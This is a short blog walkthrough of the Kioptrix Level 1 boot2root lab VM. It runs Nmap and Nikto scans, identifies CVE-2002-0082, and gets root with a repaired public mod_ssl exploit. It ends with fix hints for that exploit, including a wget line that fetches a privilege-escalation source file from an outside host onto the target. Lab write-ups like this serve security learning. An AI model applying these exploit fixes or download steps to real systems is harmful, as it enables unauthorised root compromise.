Monday, May 19, 2014

[WALKTHROUGH] KIOPTRIX Level 1

The Kioptrix series is just another set of B2R (boot2root) VMs for security lovers... :)

The very first challenge, Level 1, is relatively easy; however, I was warned by the author of Kioptrix that Level 2 will not be that easy anymore! And CHALLENGE ACCEPTED! :)

Finding the IP address of the target box using Nmap...

Target's IP: 192.168.117.143

Proceed with reconnaissance...



Scanning with Nikto...


Potential risk found! CVE-2002-0082

Finding the public exploit at exploit-db.com... Fix the exploit and exploit... :)

I would advise trying to fix the code on your own; it is really worth the time banging the wall and cracking your head to fix broken code... However, the changes made to the public exploit code will be revealed at the end of the post...


And we try attacking with the fixed-up public exploit...


We got the root shell right away....   :)

Checking out the flag....
 
Ooops... the author says that Level 2 is not going to be easy...    ;) interesting...



!! Fixes to be done on the OpenFuck exploit code !!
[+] Add: #include <openssl/rc4.h>
[+] Add: #include <openssl/md5.h>


[*] Google for "ptrace-kmod.c" and replace the link
[+] wget http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c
